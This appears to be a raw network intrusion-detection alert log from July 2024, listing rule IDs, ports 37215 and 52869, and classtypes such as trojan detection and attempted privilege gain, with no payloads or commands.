                      Timestamp:07/20/24-23:05:34.619289
                      SID:2829579
                      Source Port:43644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2835222
                      Source Port:48832
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.707199
                      SID:2027339
                      Source Port:53602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.048493
                      SID:2027339
                      Source Port:47698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2835222
                      Source Port:54502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.342828
                      SID:2831300
                      Source Port:59354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.171385
                      SID:2027339
                      Source Port:53602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2835222
                      Source Port:55046
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.930490
                      SID:2027339
                      Source Port:36850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2829579
                      Source Port:39704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.681117
                      SID:2025132
                      Source Port:60184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2835222
                      Source Port:55158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.698680
                      SID:2025132
                      Source Port:43792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.556779
                      SID:2027339
                      Source Port:41710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.472911
                      SID:2831300
                      Source Port:45890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.802333
                      SID:2025132
                      Source Port:43274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.503773
                      SID:2027339
                      Source Port:45790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.959908
                      SID:2027339
                      Source Port:46670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.529848
                      SID:2027339
                      Source Port:59978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:36.644546
                      SID:2027339
                      Source Port:34488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.987250
                      SID:2025132
                      Source Port:34528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.407056
                      SID:2831300
                      Source Port:46492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.323629
                      SID:2835222
                      Source Port:44130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435097
                      SID:2835222
                      Source Port:57846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.330840
                      SID:2027339
                      Source Port:58656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.610263
                      SID:2831300
                      Source Port:47978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.265687
                      SID:2025132
                      Source Port:33406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.088545
                      SID:2829579
                      Source Port:54562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.809338
                      SID:2027339
                      Source Port:36658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.564435
                      SID:2027339
                      Source Port:52078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.212855
                      SID:2027339
                      Source Port:52424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.550045
                      SID:2025132
                      Source Port:51284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.244494
                      SID:2025132
                      Source Port:49978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.378138
                      SID:2831300
                      Source Port:59198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.983376
                      SID:2831300
                      Source Port:36278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.404275
                      SID:2027339
                      Source Port:56148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.068388
                      SID:2027339
                      Source Port:37334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2829579
                      Source Port:36764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2829579
                      Source Port:41552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.521911
                      SID:2027339
                      Source Port:43282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.087911
                      SID:2027339
                      Source Port:39172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2835222
                      Source Port:60992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.775023
                      SID:2829579
                      Source Port:51224
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.593708
                      SID:2025132
                      Source Port:42182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.855214
                      SID:2831300
                      Source Port:39368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.144876
                      SID:2027339
                      Source Port:43886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2835222
                      Source Port:44136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.361141
                      SID:2027339
                      Source Port:39232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.377377
                      SID:2027339
                      Source Port:35816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2829579
                      Source Port:43866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.447173
                      SID:2835222
                      Source Port:52536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323623
                      SID:2835222
                      Source Port:34392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.079797
                      SID:2835222
                      Source Port:60800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.929510
                      SID:2027339
                      Source Port:50794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.048662
                      SID:2025132
                      Source Port:42992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.603344
                      SID:2027339
                      Source Port:47004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.940016
                      SID:2025132
                      Source Port:35230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:53.291407
                      SID:2027339
                      Source Port:33622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.283235
                      SID:2025132
                      Source Port:49582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.060827
                      SID:2027339
                      Source Port:46154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.091812
                      SID:2027339
                      Source Port:56846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.445004
                      SID:2831300
                      Source Port:44250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2835222
                      Source Port:38480
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.732645
                      SID:2027339
                      Source Port:49138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.394422
                      SID:2025132
                      Source Port:56764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:46.637280
                      SID:2027339
                      Source Port:47582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2835222
                      Source Port:35376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.516600
                      SID:2027339
                      Source Port:52740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:31.848052
                      SID:2831300
                      Source Port:45564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.494675
                      SID:2027339
                      Source Port:34450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.227912
                      SID:2027339
                      Source Port:37318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.971787
                      SID:2027339
                      Source Port:40000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.266001
                      SID:2025132
                      Source Port:39764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.612113
                      SID:2831300
                      Source Port:37742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.187454
                      SID:2025132
                      Source Port:38370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2835222
                      Source Port:60838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2829579
                      Source Port:41054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2835222
                      Source Port:41892
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.123303
                      SID:2831300
                      Source Port:37316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.818967
                      SID:2027339
                      Source Port:45040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.312502
                      SID:2027339
                      Source Port:57168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.444049
                      SID:2027339
                      Source Port:34278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.581565
                      SID:2027339
                      Source Port:47086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.161619
                      SID:2831300
                      Source Port:48422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.449184
                      SID:2831300
                      Source Port:39860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.365777
                      SID:2027339
                      Source Port:45970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.229188
                      SID:2027339
                      Source Port:42048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.452253
                      SID:2831300
                      Source Port:54032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.940741
                      SID:2027339
                      Source Port:46132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453720
                      SID:2831300
                      Source Port:41364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.215644
                      SID:2027339
                      Source Port:32926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2829579
                      Source Port:58088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.395251
                      SID:2027339
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2829579
                      Source Port:43472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.525551
                      SID:2027339
                      Source Port:43708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.465127
                      SID:2027339
                      Source Port:58504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.417957
                      SID:2027339
                      Source Port:58264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.437168
                      SID:2831300
                      Source Port:55944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.995248
                      SID:2025132
                      Source Port:59920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.403603
                      SID:2025132
                      Source Port:51766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.331620
                      SID:2025132
                      Source Port:55834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.367234
                      SID:2025132
                      Source Port:48504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.728679
                      SID:2027339
                      Source Port:39104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2829579
                      Source Port:58884
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.302912
                      SID:2831300
                      Source Port:36404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.201174
                      SID:2025132
                      Source Port:55798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.431738
                      SID:2025132
                      Source Port:47802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2829579
                      Source Port:58762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.157855
                      SID:2027339
                      Source Port:54260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.635095
                      SID:2027339
                      Source Port:50896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.988385
                      SID:2025132
                      Source Port:38752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.050437
                      SID:2829579
                      Source Port:60818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:28.154823
                      SID:2831300
                      Source Port:48582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.828183
                      SID:2025132
                      Source Port:52354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.348979
                      SID:2027339
                      Source Port:49308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.896111
                      SID:2027339
                      Source Port:52908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.482380
                      SID:2831300
                      Source Port:33182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.876249
                      SID:2027339
                      Source Port:34404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.108564
                      SID:2835222
                      Source Port:56248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.458829
                      SID:2027339
                      Source Port:56624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2829579
                      Source Port:57014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.806552
                      SID:2027339
                      Source Port:42192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2829579
                      Source Port:32932
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.093158
                      SID:2025132
                      Source Port:51660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.557906
                      SID:2831300
                      Source Port:55378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.783840
                      SID:2025132
                      Source Port:44688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.119988
                      SID:2027339
                      Source Port:54486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.382027
                      SID:2027339
                      Source Port:34614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.467316
                      SID:2831300
                      Source Port:44638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.592016
                      SID:2025132
                      Source Port:42276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.417792
                      SID:2027339
                      Source Port:41696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.394422
                      SID:2025132
                      Source Port:39618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.993750
                      SID:2025132
                      Source Port:51338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.102064
                      SID:2025132
                      Source Port:45610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.606361
                      SID:2027339
                      Source Port:56266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.598269
                      SID:2027339
                      Source Port:40270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.160884
                      SID:2025132
                      Source Port:39218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.604739
                      SID:2831300
                      Source Port:59340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2835222
                      Source Port:47918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.478948
                      SID:2027339
                      Source Port:42398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.329747
                      SID:2025132
                      Source Port:47022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.327173
                      SID:2831300
                      Source Port:48532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.445622
                      SID:2831300
                      Source Port:60962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2829579
                      Source Port:50700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.354373
                      SID:2835222
                      Source Port:57864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.433285
                      SID:2831300
                      Source Port:50318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.787750
                      SID:2829579
                      Source Port:50558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2835222
                      Source Port:58762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.796964
                      SID:2025132
                      Source Port:41830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.364015
                      SID:2027339
                      Source Port:36152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.587077
                      SID:2831300
                      Source Port:58094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2835222
                      Source Port:44230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.929180
                      SID:2025132
                      Source Port:57434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.192858
                      SID:2027339
                      Source Port:60954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.395080
                      SID:2831300
                      Source Port:48076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.247850
                      SID:2025132
                      Source Port:34394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.124335
                      SID:2027339
                      Source Port:58394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.014311
                      SID:2829579
                      Source Port:41114
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.515352
                      SID:2829579
                      Source Port:57262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.852857
                      SID:2829579
                      Source Port:44544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.696476
                      SID:2025132
                      Source Port:58884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.376608
                      SID:2835222
                      Source Port:50166
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.148116
                      SID:2027339
                      Source Port:56318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.617233
                      SID:2025132
                      Source Port:48512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.090071
                      SID:2831300
                      Source Port:60322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.528852
                      SID:2027339
                      Source Port:43398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257817
                      SID:2835222
                      Source Port:34108
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.227664
                      SID:2027339
                      Source Port:43300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.342606
                      SID:2831300
                      Source Port:38392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.055523
                      SID:2025132
                      Source Port:38644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.504398
                      SID:2025132
                      Source Port:40270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.352326
                      SID:2027339
                      Source Port:55860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.549791
                      SID:2831300
                      Source Port:51788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.210836
                      SID:2025132
                      Source Port:45476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2027339
                      Source Port:42456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:25.723282
                      SID:2025132
                      Source Port:59972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.234632
                      SID:2027339
                      Source Port:53108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.499623
                      SID:2025132
                      Source Port:46682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.086217
                      SID:2835222
                      Source Port:45350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.450149
                      SID:2831300
                      Source Port:40092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
